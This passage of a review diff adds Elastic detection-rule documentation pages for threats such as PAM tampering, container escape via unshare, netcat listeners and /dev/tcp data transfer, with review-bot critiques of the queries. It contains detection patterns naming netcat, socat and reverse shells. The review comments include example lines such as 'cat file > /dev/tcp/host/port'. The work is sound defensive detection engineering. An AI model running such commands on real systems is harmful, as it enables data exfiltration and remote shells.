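Review bot: The package-manager allowlist `process.name:(* and not (dnf or dnf-automatic or dpkg or yum or rpm or yum-cron or anacron))` keys on the bare process name, which an attacker patching sshd satisfies by naming the tool `yum`; the PAM rule later in this patch already excludes some writers by `process.executable` path, and the same should be done here. Separately, `file.name:libkeyutils.so` is an exact match on a keyword field, while the installed library normally carries a version suffix (`libkeyutils.so.1`, `libkeyutils.so.1.x`), so a wildcard such as `libkeyutils.so*` is needed for the match to fire. The ATT&CK mapping to T1543 (Create or Modify System Process) also does not describe patching an existing binary; T1554 (Compromise Host Software Binary, formerly Compromise Client Software Binary) is the technique for this behaviour.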
@@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration]] +=== Modification of Standard Authentication Module or Configuration + +Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/zephrax/linux-pam-backdoor +* https://github.com/eurialo/pambd +* http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html +* https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 204 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and + (file.name:pam_*.so or file.path:(/etc/pam.d/* or /private/etc/pam.d/* or /usr/lib64/security/*)) and + process.executable: + (* and + not + ( + /usr/libexec/packagekitd or + /usr/bin/vim or + /usr/libexec/xpcproxy or + /usr/bin/bsdtar or + /usr/local/bin/brew or + "/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service" + ) + ) and + not file.path: + ( + /tmp/snap.rootfs_*/pam_*.so or + /tmp/newroot/lib/*/pam_*.so or + 
/private/var/folders/*/T/com.apple.fileprovider.ArchiveService/TemporaryItems/*/lib/security/pam_*.so or + /tmp/newroot/usr/lib64/security/pam_*.so + ) and + not process.name: + ( + yum or dnf or rsync or platform-python or authconfig or rpm or pdkg or apk or dnf-automatic or btrfs or + dpkg or pam-auth-update or steam or platform-python3.6 or pam-config or microdnf or yum_install or yum-cron or + systemd or containerd or pacman + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc new file mode 100644 index 0000000000..15d9aac73c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc 
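Review bot: `pdkg` in the `not process.name:` exclusion list looks like a typo for `dpkg`, which already appears two entries later; either drop it or confirm a binary with that name exists. The same list mixes bare names (`yum`, `rsync`, `systemd`, `containerd`, `steam`) with the path-based `process.executable` exclusions above it; a name-only exclusion like `rsync` is trivially spoofed by an attacker who drops a `pam_*.so` from a process called `rsync`, so the names whose package installs to a known location should be converted to full executable paths. The description's "patching the normal authorization process" should also read "authentication process", which is what PAM and the T1556 mapping refer to.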
@@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials]] +=== Modification of the msPKIAccountCredentials + +Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming +* https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx +* https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Data Source: Active Directory +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Changes" and event.code:"5136" and + winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and + not winlog.event_data.SubjectUserSid : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** 
ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc new file mode 100644 index 0000000000..76004c1cda --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc 
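Review bot: The `==== Investigation guide` section carries an empty `[source, markdown]` block; either remove the section or supply the guide, and note that the Tags list has no `Resources: Investigation Guide` entry, so the empty block looks like a generation artifact. On the query, `winlog.event_data.OperationType:"%%14674"` is the 5136 operation code for "Value Added"; deletion of the attribute (`%%14675`, "Value Deleted") is not matched, which is fine for the overwrite scenario in the description but should be stated. Excluding only `S-1-5-18` also means that where credential roaming is enabled, the legitimate writes come from the user's own logon session rather than SYSTEM and will alert, so the rule page should call that out as a false-positive source.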
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-namespace-manipulation-using-unshare]] +=== Namespace Manipulation Using Unshare + +Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://man7.org/linux/man-pages/man1/unshare.1.html +* https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "exec_event") and +process.executable: "/usr/bin/unshare" and +not process.parent.executable: ("/usr/bin/udevadm", "*/lib/systemd/systemd-udevd", "/usr/bin/unshare") and +not process.args : "/usr/bin/snap" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ 
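Review bot: `process.executable: "/usr/bin/unshare"` is an exact path, so distributions without merged /usr (where util-linux installs the binary as /bin/unshare) and any copy executed from elsewhere are missed; `process.name == "unshare"` or a path list `("/usr/bin/unshare", "/bin/unshare")` is more robust, and the same applies to `not process.args : "/usr/bin/snap"`. The ATT&CK mapping is also off: the description talks about escaping container boundaries and escalating privileges, which maps to T1611 (Escape to Host) under TA0004, not to T1543 (Create or Modify System Process), which this rule does not detect.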
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc new file mode 100644 index 0000000000..ffadfd809b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc 
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap]] +=== Netcat Listener Established via rlwrap + +Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "rlwrap" and process.args in ( + "nc", "ncat", "netcat", "nc.openbsd", "socat" +) and process.args : "*l*" and process.args_count >= 4 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ 
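Review bot: The listener check `process.args : "*l*"` is vacuous: `process.args` starts with argv[0], which here is `rlwrap` (or `/usr/bin/rlwrap`) and already contains an `l`, so the condition is true for every rlwrap invocation and the rule fires on an outbound `rlwrap nc host port` as well. Match the listen flag explicitly instead, e.g. `process.args : ("-l", "-*l*", "*LISTEN*")` so that only flag-shaped arguments and socat's `TCP-LISTEN:` form qualify, and then the `process.args_count >= 4` guard can be reconsidered. `process.args in ("nc", "ncat", "netcat", "nc.openbsd", "socat")` is also an exact element match, so `rlwrap /usr/bin/nc -lvp 4444` is missed; adding `*/nc`-style wildcards covers the path form.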
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc new file mode 100644 index 0000000000..1413e104ed --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc 
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-network-activity-detected-via-cat]] +=== Network Activity Detected via cat + +This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "cat" and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and process.name == "cat" and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference 
URL: https://attack.mitre.org/tactics/TA0005/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc new file mode 100644 index 0000000000..1040e1894b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc 
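Review bot: The second sequence step requires `process.name == "cat"` on the network event, but with `cat file > /dev/tcp/host/port` the redirection, and therefore the connect(), is performed by the forked shell child before it execs cat; if the sensor stamps the network event with the pre-exec process name, this step never matches, so the rule should be validated against a real `cat > /dev/tcp/...` run on the supported distributions and the `maxspan=1s` window checked against the observed exec-to-connect delay. The ATT&CK section lists three tactics with no technique; T1105 (Ingress Tool Transfer) for the tool-transfer case and T1048 (Exfiltration Over Alternative Protocol) for the exfiltration case named in the description would make the mapping actionable. Also, "transfering" in the description should be "transferring".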
@@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable]] +=== Network Connection via Recently Compiled Executable + +This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("gcc", "g++", "cc")] by process.args + [file where host.os.type == "linux" and event.action == "creation" and process.name == "ld"] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start"] by process.name + [network where host.os.type == "linux" and event.action == "connection_attempted"] by process.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: 
https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc new file mode 100644 index 0000000000..b8335eb367 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc 
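Review bot: The join chain only works when gcc is given `-o <name>`: the second step joins ld's created file by `file.name` against the first step's `process.args`, so a bare `gcc shell.c` whose output is the default `a.out` never matches because `a.out` is not among gcc's arguments, and the rest of the sequence is skipped. Joining on a literal `a.out` as an alternative, or dropping the args join in favour of a `process.parent` relationship between gcc and ld, would close that gap. The compiler list `("gcc", "g++", "cc")` also omits `clang` and `clang++`, which hand linking to the system ld by default on most Linux distributions and would produce the same ld file-creation event. The description should state that the sequence is keyed on the output file name, since that is the condition analysts will need to reproduce when the rule does not fire.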
@@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-network-connection-via-registration-utility]] +=== Network Connection via Registration Utility + +Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Network Connection via Registration Utility + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation. + +This rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. + - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. + - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware. +- Investigate the target host that the signed binary is communicating with. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. 
+ - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of destination IP address and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and + process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and + not ( + (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and + (process.parent.name : "msiexec.exe" or process.parent.executable : ("C:\\Program Files (x86)\\*.exe", "C:\\Program Files\\*.exe")) + ) + ] + [network where host.os.type == "windows" and process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and + not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8") and network.protocol != "dns"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Tactic: +** Name: Defense Evasion 
+** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc new file mode 100644 index 0000000000..929f01fafb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc 
@@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-network-connection-via-signed-binary]] +=== Network Connection via Signed Binary + +Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Network Connection via Signed Binary + +By examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation. + +This rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. + - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. + - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware. +- Investigate the target host that the signed binary is communicating with. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. 
+ - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of destination IP address and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or + process.name : "ieexec.exe" or process.name : "makecab.exe") and + event.type == "start"] + [network where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or + process.name : "ieexec.exe" or process.name : "makecab.exe") and + 